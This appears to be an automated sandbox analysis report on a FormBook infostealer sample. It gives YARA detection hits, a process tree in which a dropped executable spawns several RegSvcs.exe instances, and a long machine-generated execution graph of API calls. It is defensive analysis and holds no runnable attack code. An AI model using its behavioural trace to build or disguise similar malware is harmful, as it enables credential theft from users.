                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            Has exited:false

                                            Target ID:15
                                            Start time:10:19:32
                                            Start date:08/01/2025
                                            Path:C:\Users\user\ruum\avqj.mp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                                            Imagebase:0x720000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Has exited:true

                                            Target ID:16
                                            Start time:10:19:41
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xc80000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:17
                                            Start time:10:19:41
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xe70000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:19
                                            Start time:10:19:45
                                            Start date:08/01/2025
                                            Path:C:\Users\user\ruum\avqj.mp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                                            Imagebase:0x720000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:20
                                            Start time:10:19:59
                                            Start date:08/01/2025
                                            Path:C:\Users\user\ruum\avqj.mp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                                            Imagebase:0x720000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            Target ID:21
                                            Start time:10:20:23
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x5e0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:22
                                            Start time:10:20:25
                                            Start date:08/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x730000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                              Execution Graph

                                              Execution Coverage:9.7%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:11.1%
                                              Total number of Nodes:1902
                                              Total number of Limit Nodes:26
28354->28356 28357 cb4719 SetEnvironmentVariableW GetLocalTime 28355->28357 28358 cb4635 28356->28358 28362 c9f6ba _swprintf 51 API calls 28357->28362 28360 cb46dc 28358->28360 28361 cb4642 OpenFileMappingW 28358->28361 28363 c914a7 28 API calls 28360->28363 28364 cb465b MapViewOfFile 28361->28364 28365 cb46d2 CloseHandle 28361->28365 28366 cb477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 28362->28366 28367 cb46e6 28363->28367 28364->28365 28368 cb466b UnmapViewOfFile MapViewOfFile 28364->28368 28365->28345 28369 cb07e5 34 API calls 28366->28369 28370 cb3efc 30 API calls 28367->28370 28368->28365 28371 cb4689 28368->28371 28372 cb47bc 28369->28372 28373 cb46f0 28370->28373 28374 cafc38 28 API calls 28371->28374 28376 ca3538 133 API calls 28372->28376 28377 c91a66 26 API calls 28373->28377 28375 cb4699 28374->28375 28378 cb3efc 30 API calls 28375->28378 28379 cb47cc 28376->28379 28377->28345 28380 cb46a2 28378->28380 28381 cad255 28 API calls 28379->28381 28383 ca5109 114 API calls 28380->28383 28382 cb47d8 28381->28382 28384 cad255 28 API calls 28382->28384 28385 cb46b5 28383->28385 28386 cb47e1 DialogBoxParamW 28384->28386 28387 ca51bf 114 API calls 28385->28387 28388 cad347 26 API calls 28386->28388 28389 cb46c0 28387->28389 28390 cb481e 28388->28390 28392 cb46cb UnmapViewOfFile 28389->28392 28391 cad347 26 API calls 28390->28391 28393 cb482a 28391->28393 28392->28365 28394 cb483a 28393->28394 28395 cb4833 Sleep 28393->28395 28396 cb4848 28394->28396 28397 cafb4b 48 API calls 28394->28397 28395->28394 28398 cb4852 DeleteObject 28396->28398 28397->28396 28399 cb486e 28398->28399 28400 cb4867 DeleteObject 28398->28400 28401 cb489e 28399->28401 28402 cb48b0 28399->28402 28400->28399 28403 cb3fcf 6 API calls 28401->28403 28405 caf53a GdiplusShutdown CoUninitialize 28402->28405 28404 cb48a4 CloseHandle 28403->28404 28404->28402 28406 cb48ea 28405->28406 28407 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28406->28407 28408 cb48fd 
28407->28408 28413 cb69c9 GetModuleHandleW 28408->28413 28673 cbeb91 28409->28673 28412->28297 28413->28307 28414->28309 28415->28312 28416->28287 28418->28316 28419->28318 28424 cc2d0a 28420->28424 28423 cb96f8 7 API calls 2 library calls 28423->28323 28427 cc2d27 28424->28427 28428 cc2d23 28424->28428 28425 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28426 cb5e8a 28425->28426 28426->28320 28426->28423 28427->28428 28430 cc1320 28427->28430 28428->28425 28431 cc132c __FrameHandler3::FrameUnwindToState 28430->28431 28442 cc18e1 EnterCriticalSection 28431->28442 28433 cc1333 28443 cc31d8 28433->28443 28435 cc1342 28441 cc1351 28435->28441 28456 cc11b0 29 API calls 28435->28456 28438 cc134c 28457 cc1266 GetStdHandle GetFileType 28438->28457 28439 cc1362 _abort 28439->28427 28458 cc136d LeaveCriticalSection _abort 28441->28458 28442->28433 28444 cc31e4 __FrameHandler3::FrameUnwindToState 28443->28444 28445 cc3208 28444->28445 28446 cc31f1 28444->28446 28459 cc18e1 EnterCriticalSection 28445->28459 28467 cc01d3 20 API calls _free 28446->28467 28449 cc31f6 28468 cbac8e 26 API calls _abort 28449->28468 28451 cc3200 _abort 28451->28435 28452 cc3240 28469 cc3267 LeaveCriticalSection _abort 28452->28469 28455 cc3214 28455->28452 28460 cc3129 28455->28460 28456->28438 28457->28441 28458->28439 28459->28455 28470 cc1de6 28460->28470 28462 cc313b 28466 cc3148 28462->28466 28483 cc1bba 11 API calls 2 library calls 28462->28483 28465 cc319a 28465->28455 28477 cc03d4 28466->28477 28467->28449 28468->28451 28469->28451 28475 cc1df3 _abort 28470->28475 28471 cc1e33 28485 cc01d3 20 API calls _free 28471->28485 28472 cc1e1e RtlAllocateHeap 28473 cc1e31 28472->28473 28472->28475 28473->28462 28475->28471 28475->28472 28484 cbe91a 7 API calls 2 library calls 28475->28484 28478 cc0408 _free 28477->28478 28479 cc03df RtlFreeHeap 28477->28479 28478->28465 28479->28478 28480 cc03f4 28479->28480 28486 cc01d3 20 API calls _free 28480->28486 28482 cc03fa 
GetLastError 28482->28478 28483->28462 28484->28475 28485->28473 28486->28482 28589 cb5b20 28487->28589 28490 ca6e28 28492 ca719b 28490->28492 28639 cbe50e 42 API calls __vsnwprintf_l 28490->28639 28491 ca6dd3 GetProcAddress 28493 ca6dfd GetProcAddress 28491->28493 28494 ca6de5 28491->28494 28591 ca13f9 28492->28591 28493->28490 28496 ca6e0f 28493->28496 28494->28493 28496->28490 28498 ca7098 28498->28492 28501 ca13f9 29 API calls 28498->28501 28499 ca71a6 28602 ca2117 28499->28602 28502 ca70ac 28501->28502 28503 ca70ba 28502->28503 28504 ca70bd CreateFileW 28502->28504 28503->28504 28506 ca70db SetFilePointer 28504->28506 28507 ca7186 CloseHandle 28504->28507 28506->28507 28508 ca70ed ReadFile 28506->28508 28509 c91a66 26 API calls 28507->28509 28508->28507 28510 ca7109 28508->28510 28511 ca7199 28509->28511 28514 ca711a 28510->28514 28515 ca73f2 28510->28515 28511->28492 28513 c914a7 28 API calls 28523 ca71ba 28513->28523 28517 c914a7 28 API calls 28514->28517 28642 cb5ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 28515->28642 28524 ca7133 28517->28524 28518 ca73f7 28519 ca71de CompareStringW 28519->28523 28521 c91a66 26 API calls 28521->28523 28523->28513 28523->28519 28523->28521 28525 c9ed1f 49 API calls 28523->28525 28538 ca7248 28523->28538 28606 ca067e 28523->28606 28611 ca6c5e 28523->28611 28635 ca229d 28523->28635 28526 ca7176 28524->28526 28530 ca6c5e 30 API calls 28524->28530 28640 ca6366 28 API calls 28524->28640 28525->28523 28529 c91a66 26 API calls 28526->28529 28527 ca729e 28641 ca2187 45 API calls 28527->28641 28528 ca73bd 28532 c91a66 26 API calls 28528->28532 28533 ca717e 28529->28533 28530->28524 28536 ca73c5 28532->28536 28537 c91a66 26 API calls 28533->28537 28534 c914a7 28 API calls 28534->28538 28535 ca72a7 28539 ca067e 6 API calls 28535->28539 28540 c91a66 26 API calls 28536->28540 28537->28507 28538->28534 28541 ca229d 45 API calls 28538->28541 28547 c91a66 26 API 
calls 28538->28547 28551 c9ed1f 49 API calls 28538->28551 28557 ca7292 28538->28557 28542 ca72ac 28539->28542 28543 ca73cd 28540->28543 28541->28538 28544 ca7332 28542->28544 28545 ca72b3 28542->28545 28546 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28543->28546 28549 ca6a25 53 API calls 28544->28549 28548 ca6c5e 30 API calls 28545->28548 28550 ca73e8 28546->28550 28547->28538 28552 ca72bd 28548->28552 28553 ca735b AllocConsole 28549->28553 28550->28337 28551->28538 28554 ca6c5e 30 API calls 28552->28554 28555 ca7368 GetCurrentProcessId AttachConsole 28553->28555 28568 ca7310 28553->28568 28558 ca72c7 28554->28558 28556 ca7383 28555->28556 28563 ca738c GetStdHandle WriteConsoleW Sleep FreeConsole 28556->28563 28557->28527 28557->28528 28559 ca4318 53 API calls 28558->28559 28560 ca72ec 28559->28560 28562 ca6a25 53 API calls 28560->28562 28561 ca73b5 ExitProcess 28564 ca72f6 28562->28564 28563->28568 28565 ca4318 53 API calls 28564->28565 28566 ca7307 28565->28566 28567 c914a7 28 API calls 28566->28567 28567->28568 28568->28561 28570 ca6c5e 30 API calls 28569->28570 28571 caf4e8 OleInitialize 28570->28571 28572 caf50b GdiplusStartup SHGetMalloc 28571->28572 28572->28340 28574 c925a4 26 API calls 28573->28574 28575 caf8a8 28574->28575 28576 c925a4 26 API calls 28575->28576 28577 caf8b4 28576->28577 28578 c925a4 26 API calls 28577->28578 28579 caf8c0 28578->28579 28580 c925a4 26 API calls 28579->28580 28581 caf8cc 28580->28581 28581->28342 28581->28581 28583 c91a66 26 API calls 28582->28583 28584 caf857 28583->28584 28585 c91a66 26 API calls 28584->28585 28586 caf85f 28585->28586 28587 c91a66 26 API calls 28586->28587 28588 caf867 28587->28588 28590 ca6d8d GetModuleHandleW 28589->28590 28590->28490 28590->28491 28592 ca1405 __EH_prolog3 28591->28592 28593 cb56f6 28 API calls 28592->28593 28595 ca140f 28593->28595 28594 ca1431 GetModuleFileNameW 28594->28595 28596 ca1463 28594->28596 28595->28594 28595->28596 28643 c91be3 28595->28643 
28598 c914a7 28 API calls 28596->28598 28599 ca146c 28598->28599 28600 ca147f 28599->28600 28601 c912a7 26 API calls 28599->28601 28600->28499 28601->28600 28603 ca2124 28602->28603 28604 c9769f 45 API calls 28603->28604 28605 ca2136 28604->28605 28605->28523 28607 ca06a4 GetVersionExW 28606->28607 28608 ca06d1 28606->28608 28607->28608 28609 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28608->28609 28610 ca06fa 28609->28610 28610->28523 28612 ca6c6a __EH_prolog3_GS 28611->28612 28613 cb56f6 28 API calls 28612->28613 28614 ca6c77 28613->28614 28615 ca6c8d GetSystemDirectoryW 28614->28615 28616 ca6cab 28615->28616 28633 ca6ca4 28615->28633 28617 c914a7 28 API calls 28616->28617 28618 ca6ccd 28617->28618 28621 c914a7 28 API calls 28618->28621 28619 ca6d71 28620 cb5787 5 API calls 28619->28620 28623 ca6d78 28620->28623 28624 ca6cda 28621->28624 28622 c912a7 26 API calls 28622->28619 28623->28523 28648 ca1ad1 28624->28648 28627 c91a66 26 API calls 28628 ca6cf7 28627->28628 28629 c91a66 26 API calls 28628->28629 28630 ca6cff LoadLibraryW 28629->28630 28632 ca6d1c 28630->28632 28630->28633 28632->28633 28658 c919a9 26 API calls 28632->28658 28633->28619 28633->28622 28636 ca22a6 28635->28636 28660 ca236c 28636->28660 28639->28498 28640->28524 28641->28535 28642->28518 28644 c91c03 28643->28644 28645 c91bfb 28643->28645 28644->28645 28647 c91c33 28 API calls 28644->28647 28645->28595 28647->28645 28649 ca1add __EH_prolog3_GS 28648->28649 28650 c97673 28 API calls 28649->28650 28651 ca1aef 28650->28651 28652 ca1b0c 28651->28652 28659 ca0ddb 28 API calls 28651->28659 28654 c91a66 26 API calls 28652->28654 28655 ca1b35 28654->28655 28656 cb5787 5 API calls 28655->28656 28657 ca1b3a 28656->28657 28657->28627 28658->28633 28659->28652 28661 ca2378 28660->28661 28664 ca238e 28661->28664 28663 ca22b6 28663->28523 28665 ca24e5 28664->28665 28668 ca23a4 28664->28668 28672 c958cb 45 API calls 28665->28672 28670 ca23bc 28668->28670 28671 ca0c7f 28 API 
calls 28668->28671 28670->28663 28671->28670 28674 cbeb9d _abort 28673->28674 28675 cbebb6 28674->28675 28676 cbeba4 28674->28676 28697 cc18e1 EnterCriticalSection 28675->28697 28709 cbeceb GetModuleHandleW 28676->28709 28679 cbeba9 28679->28675 28710 cbed2f GetModuleHandleExW 28679->28710 28684 cbebbd 28694 cbec32 28684->28694 28696 cbec5b 28684->28696 28718 cbf6a0 20 API calls _abort 28684->28718 28685 cbec4a 28691 cbf951 _abort 5 API calls 28685->28691 28686 cbec78 28701 cbecaa 28686->28701 28687 cbeca4 28719 cc8fc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28687->28719 28690 cbf951 _abort 5 API calls 28690->28685 28691->28696 28694->28685 28694->28690 28698 cbec9b 28696->28698 28697->28684 28720 cc1931 LeaveCriticalSection 28698->28720 28700 cbec74 28700->28686 28700->28687 28721 cc1d26 28701->28721 28704 cbecd8 28707 cbed2f _abort 8 API calls 28704->28707 28705 cbecb8 GetPEB 28705->28704 28706 cbecc8 GetCurrentProcess TerminateProcess 28705->28706 28706->28704 28708 cbece0 ExitProcess 28707->28708 28709->28679 28711 cbed59 GetProcAddress 28710->28711 28712 cbed7c 28710->28712 28713 cbed6e 28711->28713 28714 cbed8b 28712->28714 28715 cbed82 FreeLibrary 28712->28715 28713->28712 28716 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28714->28716 28715->28714 28717 cbebb5 28716->28717 28717->28675 28718->28694 28720->28700 28722 cc1d4b 28721->28722 28723 cc1d41 28721->28723 28728 cc1948 5 API calls _abort 28722->28728 28725 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28723->28725 28726 cbecb4 28725->28726 28726->28704 28726->28705 28727 cc1d62 28727->28723 28728->28727 28732 cb5680 28733 cb5696 _com_error::_com_error 28732->28733 28734 cb734a _com_raise_error RaiseException 28733->28734 28735 cb56a4 28734->28735 28736 cb4fce ___delayLoadHelper2@8 17 API calls 28735->28736 28737 cb56bc 28736->28737 28738 cb0900 28739 cb090f __EH_prolog3_catch_GS 28738->28739 28984 c91e44 28739->28984 
28742 cb125b 29090 cb3796 28742->29090 28743 cb0940 28747 cb0951 28743->28747 28748 cb0a20 28743->28748 28788 cb095f 28743->28788 28752 cb095a 28747->28752 28753 cb09fc 28747->28753 28754 cb0ab0 28748->28754 28759 cb0a36 28748->28759 28750 cb127b SendMessageW 28751 cb128a 28750->28751 28755 cb12a3 GetDlgItem SendMessageW 28751->28755 28756 cb1293 SendDlgItemMessageW 28751->28756 28762 ca4318 53 API calls 28752->28762 28752->28788 28758 cb0a15 EndDialog 28753->28758 28753->28788 28994 c91ce2 28754->28994 28761 ca1309 30 API calls 28755->28761 28756->28755 28758->28788 28760 ca4318 53 API calls 28759->28760 28764 cb0a53 SetDlgItemTextW 28760->28764 28765 cb12e3 GetDlgItem 28761->28765 28766 cb098d 28762->28766 28768 cb0a5f 28764->28768 28769 cb1302 28765->28769 29135 c91900 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28766->29135 28767 cb0b01 GetDlgItem 28771 cb0b38 SetFocus 28767->28771 28772 cb0b15 SendMessageW SendMessageW 28767->28772 28776 cb0a68 GetMessageW 28768->28776 28768->28788 29109 c91e05 28769->29109 28777 cb0b48 28771->28777 28778 cb0b6f 28771->28778 28772->28771 28774 cb0994 28780 cb09a4 28774->28780 28787 c91de7 SetDlgItemTextW 28774->28787 28782 cb0a7f IsDialogMessageW 28776->28782 28776->28788 28784 ca4318 53 API calls 28777->28784 28786 c97673 28 API calls 28778->28786 28779 cb130c 29112 caf2ce GetClassNameW 28779->29112 28780->28788 29136 c919a9 26 API calls 28780->29136 28781 cb0ae4 28792 c91a66 26 API calls 28781->28792 28782->28768 28789 cb0a8e TranslateMessage DispatchMessageW 28782->28789 28783 cb113a 28790 ca4318 53 API calls 28783->28790 28791 cb0b52 28784->28791 28794 cb0b7b 28786->28794 28787->28780 29137 cb5796 28788->29137 28789->28768 28796 cb114b SetDlgItemTextW 28790->28796 28797 c914a7 28 API calls 28791->28797 28792->28788 29154 cb34eb 28 API calls __EH_prolog3_GS 28794->29154 28801 cb1160 28796->28801 28802 cb0b5b 28797->28802 28800 cb0b88 28806 ca4318 53 API calls 28800->28806 28807 ca4318 53 API calls 
28801->28807 29140 cb3572 28802->29140 28805 cb1346 28811 cb1377 28805->28811 28814 ca4318 53 API calls 28805->28814 28810 cb0b9f 28806->28810 28812 cb117e 28807->28812 28808 cb0b6a 28815 c91a66 26 API calls 28808->28815 28809 cb1d4f 48 API calls 28809->28805 28813 ca6a25 53 API calls 28810->28813 28820 cb1d4f 48 API calls 28811->28820 28918 cb1490 28811->28918 28816 c914a7 28 API calls 28812->28816 28818 cb0ba9 28813->28818 28819 cb1359 SetDlgItemTextW 28814->28819 28821 cb0bce 28815->28821 28822 cb1187 28816->28822 28817 cb1595 28829 cb15ad 28817->28829 28830 cb15a0 EnableWindow 28817->28830 28823 cb3572 21 API calls 28818->28823 28824 ca4318 53 API calls 28819->28824 28825 cb138d 28820->28825 28826 cb0be0 28821->28826 29155 cb3d64 26 API calls __EH_prolog3_GS 28821->29155 28827 cb11f5 28822->28827 28836 c914a7 28 API calls 28822->28836 28831 cb0bbb 28823->28831 28832 cb136d SetDlgItemTextW 28824->28832 28841 cb13ad 28825->28841 28869 cb13ce 28825->28869 28828 cb0c07 28826->28828 28844 c9ed0d 49 API calls 28826->28844 28834 ca4318 53 API calls 28827->28834 29008 c9eaf3 28828->29008 28839 cb15c8 28829->28839 29172 c91cc4 GetDlgItem KiUserCallbackDispatcher 28829->29172 28830->28829 28840 c91a66 26 API calls 28831->28840 28832->28811 28835 cb11ff 28834->28835 28842 c914a7 28 API calls 28835->28842 28843 cb11a6 28836->28843 28837 cb147c 28845 cb1d4f 48 API calls 28837->28845 28849 cb15f0 28839->28849 28860 cb15e8 SendMessageW 28839->28860 28840->28808 29169 cae265 34 API calls __EH_prolog3_GS 28841->29169 28850 cb120b 28842->28850 28853 ca4318 53 API calls 28843->28853 28854 cb0bfd 28844->28854 28845->28918 28848 cb1560 29171 cae265 34 API calls __EH_prolog3_GS 28848->29171 28849->28781 28861 ca4318 53 API calls 28849->28861 28865 c914a7 28 API calls 28850->28865 28851 cb15bf 29173 c91cc4 GetDlgItem KiUserCallbackDispatcher 28851->29173 28878 cb11b6 28853->28878 28854->28828 28862 cb0c01 28854->28862 28855 cb0c20 GetLastError 28856 cb0c2b 28855->28856 29018 ca2226 
28856->29018 28860->28849 28867 cb1609 SetDlgItemTextW 28861->28867 29156 cafa79 25 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28862->29156 28864 cb1587 28873 c91a66 26 API calls 28864->28873 28874 cb1224 28865->28874 28866 c914a7 28 API calls 28866->28918 28867->28781 28869->28837 28875 cb1d4f 48 API calls 28869->28875 28870 cb0c40 28871 cb0c4c GetLastError 28870->28871 28872 cb0c5d 28870->28872 28871->28872 28880 cb0c79 GetTickCount 28872->28880 28881 cb0d0f 28872->28881 28945 cb0cfd 28872->28945 28876 cb1593 28873->28876 28885 c91a66 26 API calls 28874->28885 28879 cb1405 28875->28879 28876->28817 28877 ca4318 53 API calls 28877->28918 28895 c91a66 26 API calls 28878->28895 28879->28837 28883 cb140e DialogBoxParamW 28879->28883 29021 c9325c 28880->29021 28887 cb0f94 28881->28887 28894 ca13f9 29 API calls 28881->28894 28882 cb1046 29053 c91e1f GetDlgItem ShowWindow 28882->29053 28883->28837 28888 cb142c EndDialog 28883->28888 28890 cb1243 28885->28890 28892 cb0acb EndDialog 28887->28892 29167 c99733 28 API calls _wcslen 28887->29167 28888->28788 28896 cb1448 28888->28896 28898 c91a66 26 API calls 28890->28898 28891 cb105b 29054 c91e1f GetDlgItem ShowWindow 28891->29054 28892->28781 28901 cb0d39 28894->28901 28902 cb11e9 28895->28902 28896->28788 29170 c919a9 26 API calls 28896->29170 28904 cb124e 28898->28904 28900 cb0fae 28915 ca4318 53 API calls 28900->28915 29157 ca505a 114 API calls 28901->29157 28907 c91a66 26 API calls 28902->28907 28903 cb0c9f 28909 c91a66 26 API calls 28903->28909 28910 c91a66 26 API calls 28904->28910 28905 cb1064 28911 ca4318 53 API calls 28905->28911 28907->28827 28913 cb0cab 28909->28913 28910->28781 28914 cb106e SetDlgItemTextW 28911->28914 28912 cb0d51 28919 ca6a25 53 API calls 28912->28919 29031 c9de9a 28913->29031 29055 c91e1f GetDlgItem ShowWindow 28914->29055 28917 cb0fd4 28915->28917 28928 c91a66 26 API calls 28917->28928 28918->28817 28918->28848 28918->28866 28918->28877 28921 c91a66 26 API calls 
28918->28921 28922 cb0d80 GetCommandLineW 28919->28922 28920 cb1082 SetDlgItemTextW GetDlgItem 28924 cb109f GetWindowLongW SetWindowLongW 28920->28924 28925 cb10b7 28920->28925 28921->28918 28940 cb0e05 _wcslen 28922->28940 28924->28925 29056 cb1d4f 28925->29056 28932 cb0fea 28928->28932 28929 cb0ce0 29044 c9ddc7 28929->29044 28930 cb0cd5 GetLastError 28930->28929 28936 c91a66 26 API calls 28932->28936 28935 cb1d4f 48 API calls 28938 cb10ce 28935->28938 28939 cb0ff6 28936->28939 29076 cb3c78 28938->29076 28949 ca4318 53 API calls 28939->28949 29158 cb0405 5 API calls 2 library calls 28940->29158 28942 c91a66 26 API calls 28942->28945 28944 cb0e23 29159 cb0405 5 API calls 2 library calls 28944->29159 28945->28881 28945->28882 28948 cb1d4f 48 API calls 28960 cb10ef 28948->28960 28950 cb100c 28949->28950 28952 c914a7 28 API calls 28950->28952 28951 cb0e2f 29160 cb0405 5 API calls 2 library calls 28951->29160 28956 cb1015 28952->28956 28954 cb1110 29168 c91cc4 GetDlgItem KiUserCallbackDispatcher 28954->29168 28963 c91a66 26 API calls 28956->28963 28957 cb0e3b 29161 ca5109 114 API calls 28957->29161 28958 cb0af5 28958->28783 28958->28892 28960->28954 28962 cb1d4f 48 API calls 28960->28962 28961 cb0e4e 29162 cb3e53 28 API calls __EH_prolog3 28961->29162 28962->28954 28965 cb1031 28963->28965 28967 c91a66 26 API calls 28965->28967 28966 cb0e6b CreateFileMappingW 28968 cb0e9d MapViewOfFile 28966->28968 28969 cb0ed5 ShellExecuteExW 28966->28969 28967->28892 28970 cb0ed2 __InternalCxxFrameHandler 28968->28970 28971 cb0ef3 28969->28971 28970->28969 28972 cb0f3d 28971->28972 28973 cb0f00 WaitForInputIdle 28971->28973 28976 cb0f73 28972->28976 28977 cb0f60 UnmapViewOfFile CloseHandle 28972->28977 28974 cb0f1e 28973->28974 28974->28972 28975 cb0f23 Sleep 28974->28975 28975->28972 28975->28974 29163 c92e8b 28976->29163 28977->28976 28980 c91a66 26 API calls 28981 cb0f83 28980->28981 28982 c91a66 26 API calls 28981->28982 28983 cb0f8e 28982->28983 28983->28887 28985 c91e4d 
28984->28985 28986 c91ea6 28984->28986 28987 c91eb3 28985->28987 29174 ca3eaa 64 API calls 3 library calls 28985->29174 29175 ca3e83 GetWindowLongW SetWindowLongW 28986->29175 28987->28742 28987->28743 28987->28788 28990 c91e6f 28990->28987 28991 c91e82 GetDlgItem 28990->28991 28991->28987 28992 c91e92 28991->28992 28992->28987 28993 c91e98 SetWindowTextW 28992->28993 28993->28987 29176 cb57d8 28994->29176 28996 c91cee GetDlgItem 28997 c91d0b 28996->28997 28998 c91d1d 28996->28998 29000 c914a7 28 API calls 28997->29000 29177 c91d64 28998->29177 29001 c91d18 29000->29001 29002 c91d4d 29001->29002 29003 c91a66 26 API calls 29001->29003 29004 c91d5a 29002->29004 29005 c91a66 26 API calls 29002->29005 29003->29002 29006 cb5787 5 API calls 29004->29006 29005->29004 29007 c91d61 29006->29007 29007->28767 29007->28892 29007->28958 29015 c9eaff __EH_prolog3_GS 29008->29015 29009 cb5787 5 API calls 29010 c9ebb6 29009->29010 29010->28855 29010->28856 29011 c9eb84 29012 c9efef 54 API calls 29011->29012 29014 c9eb09 29011->29014 29012->29014 29013 c9769f 45 API calls 29013->29015 29014->29009 29015->29011 29015->29013 29015->29014 29017 c91a66 26 API calls 29015->29017 29190 c9efef 29015->29190 29017->29015 29019 ca2232 SetCurrentDirectoryW 29018->29019 29020 ca2230 29018->29020 29019->28870 29020->29019 29022 c93280 29021->29022 29224 c92f0f 29022->29224 29025 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29026 c9329d 29025->29026 29027 c92f45 29026->29027 29028 c92f55 _wcslen 29027->29028 29228 c95962 29028->29228 29030 c92f63 29030->28903 29034 c9dea6 __EH_prolog3_GS 29031->29034 29032 c9def4 29035 c9df9e 29032->29035 29036 ca169a 47 API calls 29032->29036 29033 c9df09 CreateFileW 29033->29032 29034->29032 29034->29033 29038 cb5787 5 API calls 29035->29038 29037 c9df49 29036->29037 29039 c9df6e 29037->29039 29041 c9df59 CreateFileW 29037->29041 29042 c9df56 29037->29042 29040 c9dfdf 29038->29040 29039->29035 29237 c919a9 26 API calls 29039->29237 
29040->28929 29040->28930 29041->29039 29042->29041 29045 c9ddf8 29044->29045 29046 c9de09 29044->29046 29045->29046 29048 c9de0b 29045->29048 29049 c9de04 29045->29049 29047 c91a66 26 API calls 29046->29047 29050 c9de18 29047->29050 29243 c9de50 29048->29243 29238 c9dfe2 29049->29238 29050->28942 29053->28891 29054->28905 29055->28920 29074 cb1d5e __EH_prolog3_GS 29056->29074 29058 cb349a 29059 c91a66 26 API calls 29058->29059 29060 cb34a5 29059->29060 29061 cb5787 5 API calls 29060->29061 29062 cb10c5 29061->29062 29062->28935 29063 c9769f 45 API calls 29063->29074 29064 c925a4 26 API calls 29064->29074 29066 c914a7 28 API calls 29066->29074 29067 c91a66 26 API calls 29067->29074 29068 ca645a 28 API calls 29068->29074 29071 cb34ad 29269 c958cb 45 API calls 29071->29269 29074->29058 29074->29063 29074->29064 29074->29066 29074->29067 29074->29068 29074->29071 29264 ca62cd 30 API calls 2 library calls 29074->29264 29265 caf5b2 28 API calls 29074->29265 29266 c9adaa CompareStringW 29074->29266 29267 cb44c0 26 API calls 29074->29267 29268 cb030a 28 API calls 29074->29268 29077 cb3c87 __EH_prolog3_catch_GS _wcslen 29076->29077 29270 ca6a89 29077->29270 29079 cb3cba 29274 c97903 29079->29274 29088 cb5796 5 API calls 29089 cb10e0 29088->29089 29089->28948 30122 caeaa6 29090->30122 29093 cb37bf GetWindow 29094 cb3885 29093->29094 29099 cb37d8 29093->29099 29095 cb5734 